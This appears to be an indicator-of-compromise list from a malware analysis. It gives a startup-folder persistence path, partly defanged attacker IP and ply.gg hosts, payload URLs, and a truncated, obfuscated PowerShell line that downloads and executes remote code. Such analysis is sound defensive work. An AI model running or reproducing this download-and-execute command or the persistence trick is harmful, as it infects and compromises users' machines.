Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\winlogin.exe
- '44.##3.122.41':80
- '18#.#p.ply.gg':48892
- http://44.##3.122.41/def.ps1
- http://44.##3.122.41/winlogin.exe
- DNS ASK 18#.#p.ply.gg
- '%APPDATA%\microsoft\windows\start menu\programs\startup\winlogin.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -ExecutionPolicy Bypass -Command "&('{0}{1}'-f 'IE','X') ((&('{3}{2}{0}{1}' -f '-Obje','ct','w','Ne') ('{0}{1}{3}{2}' -f 'N','et.W','t','ebClien')).('{1}{3}{2}{0}'-f'String','Do','d'...